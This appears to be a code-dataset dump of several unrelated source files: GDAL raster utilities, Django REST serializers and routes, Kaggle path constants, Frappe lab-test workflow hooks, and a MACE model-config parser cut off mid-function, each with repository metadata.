    """Read raster *f*, drop mostly-empty border rows/columns (same rule as
    auto_clip: >50 valid pixels per row/column), and write '<name>_clipped.tif'."""
    print('Reading {}'.format(f))
    arr = readData(f)
    gT = getGeoTransform(f)
    if np.isnan(no_data):
        m = ~np.isnan(arr)
    else:
        m = arr != no_data
    # BUG FIX: bare ``numpy`` relied on star imports; use the ``np`` alias.
    data_cols = np.where(m.sum(0) > 50)[0]
    data_rows = np.where(m.sum(1) > 50)[0]
    gTc = clip_gT(gT, data_rows[0], data_rows[-1], data_cols[0], data_cols[-1])
    arrC = arr[data_rows[0]:data_rows[-1], data_cols[0]:data_cols[-1]]
    writeTiff(arrC, gTc, filename=f[:-4] + '_clipped.tif')
def distance_lat_lon(lat1, lon1, lat2, lon2):
    """Great-circle distance in kilometres between two lat/lon points
    (haversine formula; 12742 km is the Earth's mean diameter)."""
    deg2rad = 0.017453292519943295
    hav = (0.5 - np.cos((lat2 - lat1) * deg2rad) / 2
           + np.cos(lat1 * deg2rad) * np.cos(lat2 * deg2rad)
           * (1 - np.cos((lon2 - lon1) * deg2rad)) / 2)
    return 12742 * np.arcsin(np.sqrt(hav))
def closest_lat_lon(lat_vector, lon_vector, lat_point, lon_point):
    """
    Find the closest index in a vector.
    index = closest_lat_lon(lat_vector, lon_vector, lat_point, lon_point)
    """
    distances = distance_lat_lon(lat_vector, lon_vector, lat_point, lon_point)
    return np.argmin(distances)
def get_point_value(filename, x, y, srs_proj4='+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs', band=1):
    """
    z=get_point_value(filename, x,y,srs_proj4='+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs')
    Sample one pixel of *band* at the coordinate (x, y), reprojecting the
    point into the raster's CRS when it differs from srs_proj4.
    """
    ds = gdal.Open(filename, gdal.GA_ReadOnly)
    w = ds.RasterXSize
    h = ds.RasterYSize
    gT = ds.GetGeoTransform()
    t_srs = get_proj4(filename)
    rb = ds.GetRasterBand(band)
    if t_srs != srs_proj4:
        # BUG FIX: the original referenced an undefined ``z``; use elevation 0
        # for a 2D raster query.
        x, y, z = transformPoint(x, y, 0.0, s_srs=srs_proj4, t_srs=t_srs)
    # coord2xy returns (row, col).
    row, col = coord2xy(x, y, gT)
    # BUG FIX: the original passed the undefined names ``px, py``; ReadAsArray
    # takes (xoff=col, yoff=row) — confirm axis order against real data.
    return rb.ReadAsArray(int(col), int(row), 1, 1)[0]
| bosmanoglu/adore-doris | lib/python/gis.py | gis.py | py | 21,211 | python | en | code | 13 | github-code | 36 | [
{
"api_name": "numpy.float64",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "os.path.isfile",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "osgeo.gdal.Open",
... |
31746754037 | from django.core.exceptions import ValidationError
from rest_framework import serializers
from reviews.models import Category, Comment, Genre, Review, Title, User
class ConfirmationTokenSerializer(serializers.Serializer):
    """Validates the username/confirmation-code pair used to finish sign-up."""
    # Field declaration order is significant in DRF: it fixes the output order.
    username = serializers.CharField(required=True)
    confirmation_code = serializers.CharField(required=True)
class RegistrationSerializer(serializers.Serializer):
    """Validates sign-up data (email + username)."""
    email = serializers.EmailField(required=True)
    username = serializers.CharField(required=True)
    def validate(self, data):
        # The name "me" is reserved and rejected outright.
        if data["username"] == "me":
            raise ValidationError("Пользователь не может иметь имя 'me'")
        return data
class UserSerializer(serializers.ModelSerializer):
    """Full user profile representation, including role and bio."""
    class Meta:
        model = User
        fields = (
            "username",
            "first_name",
            "last_name",
            "email",
            "bio",
            "role",
        )
class CategorySerializer(serializers.ModelSerializer):
    """Serializer for categories."""
    class Meta:
        model = Category
        fields = ("name", "slug")
        # Categories are addressed by slug in URLs rather than by pk.
        lookup_field = 'slug'
class GenreSerializer(serializers.ModelSerializer):
    """Serializer for genres."""
    # NOTE(review): unlike CategorySerializer, no lookup_field is set here —
    # confirm whether genres are also routed by slug.
    class Meta:
        model = Genre
        fields = ("name", "slug")
class WriteTitleSerializer(serializers.ModelSerializer):
    """Serializer for write request for titles."""
    # On writes, category and genre are supplied by slug, not as nested objects.
    category = serializers.SlugRelatedField(
        slug_field="slug",
        queryset=Category.objects.all(),
    )
    genre = serializers.SlugRelatedField(
        many=True,
        slug_field="slug",
        queryset=Genre.objects.all(),
    )
    rating = serializers.SerializerMethodField()
    class Meta:
        model = Title
        fields = "__all__"
    def get_rating(self, obj):
        """Return 0 after creation."""
        # A freshly created title has no reviews, hence no rating yet.
        return 0
class ReadTitleSerializer(serializers.ModelSerializer):
    """Serializer for read requests for titles."""
    # Reads expose full nested genre/category objects, unlike the write serializer.
    genre = GenreSerializer(many=True)
    category = CategorySerializer()
    rating = serializers.SerializerMethodField()
    class Meta:
        model = Title
        fields = "__all__"
        read_only_fields = ("name", "year", "description", "genre", "category")
    def get_rating(self, obj):
        """Return object rating calculated in viewset."""
        # The viewset is expected to provide ``obj.rating``; just pass it through.
        return obj.rating
class ReviewSerializer(serializers.ModelSerializer):
    """Serializer for reviews."""
    score = serializers.IntegerField(max_value=10, min_value=0)
    author = serializers.SlugRelatedField(
        slug_field="username",
        read_only=True,
        default=serializers.CurrentUserDefault(),  # defaults to the requesting user
    )
    class Meta:
        model = Review
        fields = ("id", "text", "author", "score", "pub_date")
    def validate(self, attrs):
        """Check that each author can have only one review
        for particular title.
        """
        # Updates (PATCH/PUT) keep the existing review; only creation is limited.
        if not self.context["request"].method == "POST":
            return attrs
        if Review.objects.filter(
            title_id=self.context["view"].kwargs.get("title_id"),
            author=self.context["request"].user,
        ).exists():
            raise serializers.ValidationError(
                (
                    "Автор может оставлять ревью на каждое произведение "
                    "только один раз"
                )
            )
        return attrs
class CommentSerializer(serializers.ModelSerializer):
    """Serializer for comments."""
    # Author is exposed by username and never writable through the API.
    author = serializers.SlugRelatedField(
        slug_field="username",
        read_only=True,
    )
    class Meta:
        model = Comment
        fields = ("id", "text", "author", "pub_date")
| GenVas/yamdb_final | api/serializers.py | serializers.py | py | 3,954 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "rest_framework.serializers.Serializer",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "rest_framework.serializers",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "rest_framework.serializers.CharField",
"line_number": 10,
"usage_type... |
18664116649 | from pathlib import Path
import joblib
# Toggle between the Kaggle and local directory layouts.
IS_KAGGLE = True
if IS_KAGGLE:
    DATA_DIR = Path("/kaggle/working/chap5-data")
    OUTPUT_DIR = Path("/kaggle/working/")
else:
    DATA_DIR = Path("../data")  # Path(os.getenv("QQP_DATA_DIR", "/data"))
    OUTPUT_DIR = Path("../outputs")
# Raw input CSVs.
INPUT_DIR = DATA_DIR / "input"
TRAIN_CSV_PATH = INPUT_DIR / "train.csv"
TEST_CSV_PATH = INPUT_DIR / "test.csv"
# Pre-trained GloVe word embeddings (binary format).
EMBEDDING_DIR = DATA_DIR / "embeddings"
GLOVE_PATH = EMBEDDING_DIR / "glove.840B.300d.bin"
# joblib disk cache for expensive feature computations.
FEATURE_MEMORY = joblib.Memory(DATA_DIR / "cache")
SPLIT_RANDOM_SEED = 1
EPS = 1e-10
NUM_PROCESSES = 4  # int(os.getenv("NUM_PROCESSES", 1))
# Expected sample counts; NUM_DRYRUN_SAMPLES caps quick test runs.
NUM_TRAIN_SAMPLES = 404290
NUM_TEST_SAMPLES = 2345796
NUM_DRYRUN_SAMPLES = 1000
| room-208/Kaggle-Gokui-Book | chap5/common/constants.py | constants.py | py | 708 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pathlib.Path",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "pathlib.Path",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "pathlib.Path",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "pathlib.Path",
"line_number"... |
72056734183 | from warnings import filters
from billing.billing.api.sales_invoice.create_sales_invoice import re_eveluate_sales_orders
# from billing.billing.utils.payment_notifications import get_party_phone
import frappe
from datetime import date
from frappe.utils.background_jobs import enqueue
from frappe.utils.data import nowdate
def calculate_age(birthDate):
    """Return the age in whole years for the given birth date."""
    MEAN_GREGORIAN_YEAR = 365.2425  # mean Gregorian year length in days
    elapsed_days = (date.today() - birthDate).days
    return int(elapsed_days / MEAN_GREGORIAN_YEAR)
def lab_test_after_insert_hook(doc, state):
    """after_insert hook for Lab Test: fill in the derived patient age and
    sex fields, then queue background jobs that group tests sharing the
    same sample and backfill missing ages.

    Note: saving the freshly inserted document triggers on-save hooks a
    second time.
    """
    patient = doc.get('patient')
    dob = frappe.db.get_value('Patient', {'name': patient}, 'dob')
    # Some Patient records use 'gender', older ones 'sex'; prefer 'gender'.
    gender = frappe.db.get_value('Patient', {'name': patient}, 'gender')
    sex = frappe.db.get_value('Patient', {'name': patient}, 'sex')
    doc.patient_age = age_calc(dob, doc.name)
    doc.patient_sex = gender or sex
    doc.save(ignore_permissions=True)
    # Run the slow grouping / backfill work outside the request cycle.
    enqueue(method=append_same_category_tests, name=doc.get('name'), queue='short', timeout=600)
    enqueue(method=tetst_age_fix, queue='short', timeout=600)
    # test_sharing_sample_with = doc.get('share_sample_with')
    # frappe.msgprint("sharing sample " + test_sharing_sample_with)
    # if test_sharing_sample_with:
    #     frappe.db.set_value('Lab Test', test_sharing_sample_with,{'share_sample_with': doc.name})
    # tests_sharing_sample = frappe.db.get_all('Lab Test Sample Share',filters={'parent':doc.name},fields=['name','lab_test'])
    # if len(tests_sharing_sample)>0:
    #     for test in tests_sharing_sample:
    #         lab_test = frappe.get_doc('Lab Test',test['lab_test'])
    #         test_item = lab_test.append('lab_test_sample_share')
    #         test_item.lab_test = test['lab_test']
    #         lab_test.save(ignore_permissions=True)
    #     frappe.msgprint('updated related')
def age_calc(dob, lab_name=''):
    """Return a compact age string for *dob*: "<n>Y", "<n>M", "<n>D" or "<n>H".

    The first non-zero unit (years, months, days, hours) wins.  *lab_name*
    is kept for backward compatibility with the (commented-out) error
    logging of implausible ages.

    Bug fixed: the original fell off the end and returned None for a
    patient born less than an hour ago; we now fall back to "0H".
    """
    currentDate = date.today()
    elapsed = currentDate - dob  # assumes dob is a datetime.date — TODO confirm
    years = elapsed.total_seconds() / (365.242 * 24 * 3600)
    yearsInt = int(years)
    months = (years - yearsInt) * 12
    monthsInt = int(months)
    days = (months - monthsInt) * (365.242 / 12)
    daysInt = int(days)
    hours = (days - daysInt) * 24
    hoursInt = int(hours)
    if yearsInt > 0:
        # if yearsInt > 100:
        #     enqueue(method=log_error, lab_name=lab_name, dob=dob, queue='short', timeout=600)
        return "{0}Y".format(yearsInt)
    if monthsInt > 0:
        return "{0}M".format(monthsInt)
    if daysInt > 0:
        return "{0}D".format(daysInt)
    # Fall-through fallback so newborns never get a None age.
    return "{0}H".format(hoursInt)
# bench execute lims.doc_hooks.lab_test.age_test
def age_test():
    """Debug helper (bench execute): print the computed age for every Lab
    Test of a hard-coded patient; the DB write is left commented out."""
    pats = frappe.get_all('Lab Test', fields=['name', 'patient'], filters={'patient': '1122083'})
    for p in pats:
        print(p['name'])
        dob = frappe.db.get_value('Patient', {'name': p['patient']}, 'dob')
        # print(type(dob))
        print(str(dob))
        age = age_calc(dob, p['name'])
        print('age ', age)
        # frappe.db.set_value('Lab Test',p['name'],{'patient_age':age})
# bench execute lims.doc_hooks.lab_test.append_same_category_tests
@frappe.whitelist()
def append_same_category_tests(name):
    """For the patient of Lab Test *name*, find all draft Lab Tests whose
    template appears in Lab Test Codes, cross-link them as sharing one
    sample, and return a list of link/state dicts for the UI.

    NOTE(review): the SQL below interpolates the patient id with
    str.format; the value comes from the database, but parameterized
    queries would be safer.
    """
    from mtrh_dev.mtrh_dev.utilities import get_link_to_form_new_tab
    # from clinical.hook.lab_test import get_sample_shares
    # name='3BQ'
    lab_doc = frappe.get_doc('Lab Test', name)
    sql = """select tlt.name,tlt.template,tlt.workflow_state,ltc.test_group,ltc.lab_test_template,tlt.patient from `tabLab Test` tlt RIGHT join `tabLab Test Codes` ltc on tlt.template=ltc.lab_test_template where tlt.patient='{0}' and tlt.docstatus=0""".format(lab_doc.patient)
    # tlt.workflow_state='To Receive' and and tlt.template='{1}' ,doc.template
    # print(sql)
    # link_arr=[]
    name_arr = []
    res = frappe.db.sql(sql, as_dict=1)
    names = [x.name for x in res]
    for n in names:
        # link_arr.append(get_link_to_form_new_tab(doctype="Lab Test", name=n, label=n))
        name_arr.append({'name': get_link_to_form_new_tab(doctype="Lab Test", name=n, label=n), 'Test': frappe.db.get_value('Lab Test', n, 'template'), 'workflow_state': frappe.db.get_value('Lab Test', n, 'workflow_state')})
        update_sample_share(n, names)
    # frappe.msgprint(title='Labs Sharing Same Sample',msg=str(name_arr))
    get_sample_shares(name)
    return name_arr
def update_sample_share(name, names):
    """Append every other test in *names* to the lab_test_sample_share
    child table of Lab Test *name*, skipping duplicates already linked."""
    lab_doc = frappe.get_doc('Lab Test', name)
    for n in names:
        if n != lab_doc.get('name'):
            # Only add the link once per (parent, lab_test) pair.
            if not frappe.db.exists('Lab Test Sample Share', {'parent': name, 'lab_test': n}):
                sample_share = lab_doc.append('lab_test_sample_share')
                sample_share.lab_test = n
                lab_doc.save(ignore_permissions=True)
def get_sample_shares(lab_name):
    """Collect every Lab Test that shares a sample with *lab_name*
    (looking both where it is the parent and where it is a linked child),
    pick the first non-empty processing_lab/employee among them, and
    print the set; the bulk workflow update call is left disabled.
    """
    tests_sharing_sample_child = frappe.db.get_all('Lab Test Sample Share', filters={'lab_test': ['IN', lab_name]}, fields=['name', 'lab_test', 'parent'])
    tests_sharing_sample_parent = frappe.db.get_all('Lab Test Sample Share', filters={'parent': lab_name}, fields=['name', 'lab_test', 'parent'])
    # Prefer the parent-side links; fall back to child-side links.
    tests_sharing_sample = tests_sharing_sample_parent or tests_sharing_sample_child
    test_names = []
    if len(tests_sharing_sample) > 0:
        # Re-query through the common parent so the full group is covered.
        parent_test = tests_sharing_sample[0]['parent']
        tests_sharing_sample = frappe.db.get_all('Lab Test Sample Share', filters={'parent': parent_test}, fields=['name', 'lab_test'])
        for test in tests_sharing_sample:
            test_names.append(test['lab_test'])
        test_names.append(lab_name)
    else:
        test_names.append(lab_name)
    # De-duplicate while preserving order.
    shares = list(dict.fromkeys(test_names))
    process_lab_array = frappe.db.get_all('Lab Test', filters={'name': ['IN', shares]}, fields=['processing_lab'])
    employee_array = frappe.db.get_all('Lab Test', filters={'name': ['IN', shares]}, fields=['employee'])
    process_lab = ''
    employee = ''
    # Last non-empty value wins across the shared group.
    for l in process_lab_array:
        if l.processing_lab:
            process_lab = l.processing_lab
    for e in employee_array:
        if e.employee:
            employee = e.employee
    for n in shares:
        print(n)
        # bulk_workflow_update(docname=n,process_lab=process_lab,employee=employee)
def bulk_workflow_update(docname, process_lab='', employee=''):
    """Advance Lab Test *docname* one step in its workflow based on its
    current state, copying processing_lab/employee onto it at the
    sampling/receiving stages.

    Note: workflow_state is read once, so a single call performs at most
    one transition even though the `if`s are not chained.
    """
    from frappe.model.workflow import apply_workflow
    doc = frappe.get_doc('Lab Test', docname)  # 'IP'
    # print(get_sample_shares(doc.name))
    # State -> action table (kept from the original for reference):
    # Awaiting Checkin      -> Forward For Payment
    # Awaiting Payment      -> Approve Payment
    # Awaiting Sampling     -> Send To Lab
    # To receive            -> Receive Lab Test
    # Processing            -> Forward For Verification
    # Awaiting Verification -> Post Lab Test
    workflow_state = doc.get('workflow_state')
    if workflow_state == 'Awaiting Checkin':
        apply_workflow(doc=doc, action="Forward For Payment")
    if workflow_state == 'Awaiting Payment':
        # apply_workflow(doc=doc, action="Approve Payment")
        # Re-check billing before approving the payment step.
        re_eveluate_sales_orders(patient_name=doc.patient, lab_name=doc.name)
        apply_workflow(doc=doc, action="Approve Payment")
    if workflow_state == 'Awaiting Sampling':
        doc.processing_lab = process_lab
        doc.employee = employee
        doc.save(ignore_permissions=True)
        apply_workflow(doc=doc, action="Send To Lab")
    if workflow_state == 'To receive':
        doc.processing_lab = process_lab
        doc.employee = employee
        doc.save(ignore_permissions=True)
        apply_workflow(doc=doc, action="Receive Lab Test")
    if workflow_state == 'Processing':
        apply_workflow(doc=doc, action="Forward For Verification")
    if workflow_state == 'Awaiting Verification':
        apply_workflow(doc=doc, action="Post Lab Test")
# bench execute lims.doc_hooks.lab_test.lab_clean
def lab_clean():
    """One-off cleanup (bench execute): delete every Normal Test Result
    row of the hard-coded parent 'B73' except the first one returned."""
    sql = "select name,idx from `tabNormal Test Result` where parent='B73'"
    items = frappe.db.sql(sql, as_dict=1)
    count = 0
    for i in items:
        count += 1
        if count > 1:
            # Keep only the first row; drop the rest directly via SQL.
            sq = "delete from `tabNormal Test Result` where name='{0}'".format(i.name)
            frappe.db.sql(sq, as_dict=1)
    print(count)
# bench execute lims.doc_hooks.lab_test.comment_count
def comment_count(name='B73'):
    """One-off cleanup (bench execute): for every Sales Invoice with more
    than 15 comments, delete all but the first comment and commit.

    Note: the *name* parameter is unused; the query drives everything.
    """
    # return 1
    sqlc = "select count(name) as cnt,reference_name from tabComment where reference_doctype='Sales Invoice' and reference_name is not null group by reference_name HAVING COUNT(name) > 15 order by reference_name"
    parents = frappe.db.sql(sqlc, as_dict=1)
    for p in parents:
        print('ref ', p.reference_name, ' ', p.cnt)
        sql = "select name,reference_doctype,reference_name from tabComment where reference_name='{0}'".format(p.reference_name)
        # print(sql)
        items = frappe.db.sql(sql, as_dict=1)
        count = 0
        for i in items:
            count += 1
            if count > 1:
                print('item count ', count)
                sq = "delete from tabComment where name='{0}'".format(i.name)
                frappe.db.sql(sq, as_dict=1)
                # frappe.delete_doc('Comment',i.name)
        frappe.db.commit()
        # print(count)
# bench execute lims.doc_hooks.lab_test.tetst_age_fix
def tetst_age_fix():
    """Backfill job (also enqueued from the insert hook): compute and set
    patient_age on every Lab Test where it is still NULL."""
    sql = "select name,patient,docstatus from `tabLab Test` where patient_age is null;"
    labs = frappe.db.sql(sql, as_dict=1)
    for lab in labs:
        patient = lab.get('patient')
        # print(' patient ', patient)
        dob = frappe.db.get_value('Patient', {'name': patient}, 'dob')
        patient_age = age_calc(dob, lab.get('name'))
        # print(patient_age)
        up_sq = "update `tabLab Test` set patient_age ='{0}' where name='{1}';".format(patient_age, lab.get('name'))
        print(up_sq)
        frappe.db.sql(up_sq, as_dict=1)
def log_error(lab_name, dob):
    """Record an implausible dob for *lab_name* in the Lims Error Log
    doctype (used by the commented-out >100y check in age_calc)."""
    log = frappe.new_doc('Lims Error Log')
    log.ordernumber = lab_name
    log.log_number = ''
    log.unprocessed_result = str(dob)
    log.save(ignore_permissions=True)
# bench execute lims.doc_hooks.lab_test.patient_record_exist
def patient_record_exist():
    """Diagnostic (bench execute): compare the number of submitted Lab
    Tests with the number of Patient Medical Records referencing them."""
    # labs = frappe.get_all("Lab Test",filters={'docstatus':1},fields=['name','patient'])
    labs = frappe.db.count('Lab Test', {'docstatus': 1})
    recs = frappe.db.count('Patient Medical Record', {'reference_doctype': 'Lab Test'})
    print('labs ', labs, ' recs ', recs)
{
"api_name": "datetime.date.today",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "datetime.date",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "frappe.db.get_value",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "frappe.db",
... |
40423351728 | from django.urls import path, include
from . import views
from rest_framework import routers
# DRF router exposing the app's viewsets; all generated URLs are mounted
# at the root of this urlconf.
route = routers.DefaultRouter()
route.register("user", views.UserViewSet, basename='user')
route.register("tuyenxe", views.TuyenXeViewset, basename='tuyenxe')
route.register("chuyenxe", views.ChuyenXeViewset, basename='chuyenxe')
route.register("datve", views.DatVeViewset, basename='datve')
route.register(prefix='comments', viewset=views.CommentViewSet, basename='comment')
# route.register("thongke", views.ThongKeViewSet, basename='thongke')

urlpatterns = [
    path('', include(route.urls)),
]
| TamHoang1512/backend-django | QuanLyXeKhach/quanly/urls.py | urls.py | py | 595 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "rest_framework.routers.DefaultRouter",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "rest_framework.routers",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "django.urls.path",
"line_number": 15,
"usage_type": "call"
},
{
"api_na... |
15733574091 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
import os
import copy
import yaml
from enum import Enum
from utils.util import mace_check
from utils.util import MaceLogger
from py_proto import mace_pb2
# C++ keywords plus preprocessor directive names — presumably used to keep
# generated identifiers from colliding with reserved words (confirm at call
# sites).  NOTE(review): 'if' and 'else' appear twice because the keyword
# list and the preprocessor list were concatenated; harmless for membership
# tests.
CPP_KEYWORDS = [
    'alignas', 'alignof', 'and', 'and_eq', 'asm', 'atomic_cancel',
    'atomic_commit', 'atomic_noexcept', 'auto', 'bitand', 'bitor',
    'bool', 'break', 'case', 'catch', 'char', 'char16_t', 'char32_t',
    'class', 'compl', 'concept', 'const', 'constexpr', 'const_cast',
    'continue', 'co_await', 'co_return', 'co_yield', 'decltype', 'default',
    'delete', 'do', 'double', 'dynamic_cast', 'else', 'enum', 'explicit',
    'export', 'extern', 'false', 'float', 'for', 'friend', 'goto', 'if',
    'import', 'inline', 'int', 'long', 'module', 'mutable', 'namespace',
    'new', 'noexcept', 'not', 'not_eq', 'nullptr', 'operator', 'or', 'or_eq',
    'private', 'protected', 'public', 'register', 'reinterpret_cast',
    'requires', 'return', 'short', 'signed', 'sizeof', 'static',
    'static_assert', 'static_cast', 'struct', 'switch', 'synchronized',
    'template', 'this', 'thread_local', 'throw', 'true', 'try', 'typedef',
    'typeid', 'typename', 'union', 'unsigned', 'using', 'virtual', 'void',
    'volatile', 'wchar_t', 'while', 'xor', 'xor_eq', 'override', 'final',
    'transaction_safe', 'transaction_safe_dynamic', 'if', 'elif', 'else',
    'endif', 'defined', 'ifdef', 'ifndef', 'define', 'undef', 'include',
    'line', 'error', 'pragma',
]
def sanitize_load(s):
    """Parse a YAML string after two sanitizing passes: quote bare ON/OFF
    values so PyYAML does not turn them into booleans, and expand ${VAR}
    from the environment (KeyError if a referenced variable is unset).

    Fixes: (1) the ON/OFF regex used "$" without re.M, so only the last
    line of a multi-line document was ever quoted; (2) yaml.load was
    called without a Loader, which warns on PyYAML >= 5.1 and raises
    TypeError on PyYAML 6.  SafeLoader is sufficient for plain configs
    and avoids constructing arbitrary Python objects.
    """
    # do not let yaml parse ON/OFF to boolean (anchor per line, not per doc)
    for w in ["ON", "OFF", "on", "off"]:
        s = re.sub(r":\s+" + w + "$", r": '" + w + "'", s, flags=re.M)
    # sub ${} to env value
    s = re.sub(r"\${(\w+)}", lambda x: os.environ[x.group(1)], s)
    return yaml.load(s, Loader=yaml.SafeLoader)
def parse(path):
    """Read the YAML file at *path* and return it parsed via sanitize_load."""
    with open(path) as config_file:
        return sanitize_load(config_file.read())
def parse_device_info(path):
    """Return the "devices" section of the YAML device-info file at *path*."""
    return parse(path)["devices"]
class ModelKeys(object):
    """String keys used in the model deployment YAML configuration."""
    platform = "platform"
    runtime = "runtime"
    models = 'models'
    graph_optimize_options = "graph_optimize_options"
    # --- input tensor description ---
    input_tensors = "input_tensors"
    input_shapes = "input_shapes"
    input_data_types = "input_data_types"
    input_data_formats = "input_data_formats"
    input_ranges = "input_ranges"
    # --- output tensor description ---
    output_tensors = "output_tensors"
    output_shapes = "output_shapes"
    output_data_types = "output_data_types"
    output_data_formats = "output_data_formats"
    # --- validation-check tensors ---
    check_tensors = "check_tensors"
    check_shapes = "check_shapes"
    # --- model files and checksums ---
    model_file_path = "model_file_path"
    model_sha256_checksum = "model_sha256_checksum"
    weight_file_path = "weight_file_path"
    weight_sha256_checksum = "weight_sha256_checksum"
    # --- quantization options ---
    quantize_range_file = "quantize_range_file"
    quantize = "quantize"
    quantize_schema = "quantize_schema"
    quantize_large_weights = "quantize_large_weights"
    quantize_stat = "quantize_stat"
    change_concat_ranges = "change_concat_ranges"
    winograd = "winograd"
    cl_mem_type = "cl_mem_type"
    data_type = "data_type"
    subgraphs = "subgraphs"
    validation_inputs_data = "validation_inputs_data"
class DataFormat(Enum):
    """Tensor layout identifiers: values 1-2 are activation layouts,
    100-103 are filter/weight layouts, AUTO is a sentinel (presumably
    resolved later by the converter — confirm at call sites)."""
    NONE = 0
    NHWC = 1
    NCHW = 2
    HWIO = 100
    OIHW = 101
    HWOI = 102
    OHWI = 103
    AUTO = 1000
def parse_data_format(str):
    """Parse a case-insensitive layout name into a DataFormat member;
    mace_check fails on unknown names.  (Note: the parameter shadows the
    builtin `str`; kept for interface compatibility.)"""
    str = str.upper()
    mace_check(str in [e.name for e in DataFormat],
               "unknown data format %s" % str)
    return DataFormat[str]
class DeviceType(Enum):
    """Target compute devices; CPU_GPU is the combined fallback mode."""
    CPU = 0
    GPU = 2
    HEXAGON = 3
    HTA = 4
    APU = 5
    CPU_GPU = 100
# Config "runtime" string -> DeviceType.  'dsp' is an alias for hexagon.
DEVICE_MAP = {
    "cpu": DeviceType.CPU,
    "gpu": DeviceType.GPU,
    "hexagon": DeviceType.HEXAGON,
    "dsp": DeviceType.HEXAGON,
    "hta": DeviceType.HTA,
    "apu": DeviceType.APU,
    "cpu+gpu": DeviceType.CPU_GPU
}
def parse_device_type(str):
    """Map a config runtime name to a DeviceType via DEVICE_MAP;
    mace_check fails on unknown names."""
    mace_check(str in DEVICE_MAP, "unknown device %s" % str)
    return DEVICE_MAP[str]
class Platform(Enum):
    """Source frameworks a model can be converted from."""
    TENSORFLOW = 0
    CAFFE = 1
    ONNX = 2
    MEGENGINE = 3
    KERAS = 4
    PYTORCH = 5
def parse_platform(str):
    """Parse a case-insensitive framework name into a Platform member;
    mace_check fails on unknown names."""
    str = str.upper()
    mace_check(str in [e.name for e in Platform],
               "unknown platform %s" % str)
    return Platform[str]
# Subset of config dtype strings -> proto dtypes.  parse_data_type below
# additionally accepts 'float16'.
DATA_TYPE_MAP = {
    'float32': mace_pb2.DT_FLOAT,
    'int32': mace_pb2.DT_INT32,
}
def parse_data_type(str):
    """Parse a config data-type string into a mace_pb2 DT_* value;
    unsupported names fail through mace_check (and return None if
    mace_check does not raise)."""
    supported = {
        "float32": mace_pb2.DT_FLOAT,
        "float16": mace_pb2.DT_FLOAT16,
        "int32": mace_pb2.DT_INT32,
    }
    if str in supported:
        return supported[str]
    mace_check(False, "data type %s not supported" % str)
def parse_internal_data_type(str):
    """Map an internal precision spec (e.g. 'fp32_fp32') to a mace_pb2
    dtype; anything unrecognized falls back to DT_HALF."""
    dispatch = {
        'fp32_fp32': mace_pb2.DT_FLOAT,
        'bf16_fp32': mace_pb2.DT_BFLOAT16,
        'fp16_fp16': mace_pb2.DT_FLOAT16,
    }
    return dispatch.get(str, mace_pb2.DT_HALF)
def to_list(x):
    """Return *x* unchanged if it is already a list, else wrap it in one."""
    return x if isinstance(x, list) else [x]
def parse_int_array(xs):
    """Parse a comma-separated string of ints; an empty string yields [1]
    (a scalar shape placeholder).

    Fix: the original tested ``len(xs) is 0`` — an identity comparison
    that only works because CPython caches small ints and that raises a
    SyntaxWarning on Python >= 3.8.
    """
    if len(xs) == 0:
        return [1]
    return [int(x) for x in xs.split(",")]
def parse_float_array(xs):
    """Parse a comma-separated string of floats into a list."""
    return list(map(float, xs.split(",")))
def normalize_input_data_types(conf, input_count):
    """Resolve conf[input_data_types] to exactly one dtype per input
    tensor, defaulting to the model data type (with DT_HALF downgraded
    to DT_FLOAT for compatibility) and broadcasting a single entry."""
    default_input_dt = conf[ModelKeys.data_type]
    if default_input_dt == mace_pb2.DT_HALF:
        default_input_dt = mace_pb2.DT_FLOAT  # Compatible with old version
    conf_input_dts = to_list(conf.get(ModelKeys.input_data_types, []))
    if len(conf_input_dts) == 0:
        input_data_types = [default_input_dt]
    else:
        input_data_types = [parse_data_type(dt) for dt in conf_input_dts]
    if len(input_data_types) == 1 and input_count > 1:
        input_data_types = [input_data_types[0]] * input_count
    mace_check(len(input_data_types) == input_count,
               "the number of input_data_types should be "
               "the same as input tensors")
    conf[ModelKeys.input_data_types] = input_data_types
def normalize_output_data_types(conf, output_count):
    """Resolve conf[output_data_types] to exactly one dtype per output
    tensor; mirror image of normalize_input_data_types (NOTE(review):
    the two are near-duplicates and could share a helper)."""
    default_output_dt = conf[ModelKeys.data_type]
    if default_output_dt == mace_pb2.DT_HALF:
        default_output_dt = mace_pb2.DT_FLOAT  # Compatible with old version
    conf_output_dts = to_list(conf.get(ModelKeys.output_data_types, []))
    if len(conf_output_dts) == 0:
        output_data_types = [default_output_dt]
    else:
        output_data_types = [parse_data_type(dt) for dt in conf_output_dts]
    if len(output_data_types) == 1 and output_count > 1:
        output_data_types = [output_data_types[0]] * output_count
    mace_check(len(output_data_types) == output_count,
               "the number of output_data_types should be "
               "the same as output tensors")
    conf[ModelKeys.output_data_types] = output_data_types
def normalize_model_config(conf):
    """Return a deep-copied, fully-normalized model config dict: the first
    subgraph is flattened into the top level, platform/runtime/dtype
    strings are parsed to enums, and every per-tensor list (shapes,
    dtypes, formats, ranges) is broadcast/validated to match the tensor
    count.  The input dict is not mutated.
    """
    conf = copy.deepcopy(conf)
    # Flatten the first subgraph into the top-level config.
    if ModelKeys.subgraphs in conf:
        subgraph = conf[ModelKeys.subgraphs][0]
        del conf[ModelKeys.subgraphs]
        conf.update(subgraph)
    conf[ModelKeys.platform] = parse_platform(conf[ModelKeys.platform])
    conf[ModelKeys.runtime] = parse_device_type(conf[ModelKeys.runtime])
    # Quantized models always carry float data externally; otherwise parse
    # the internal precision spec, defaulting to half precision.
    if ModelKeys.quantize in conf and conf[ModelKeys.quantize] == 1:
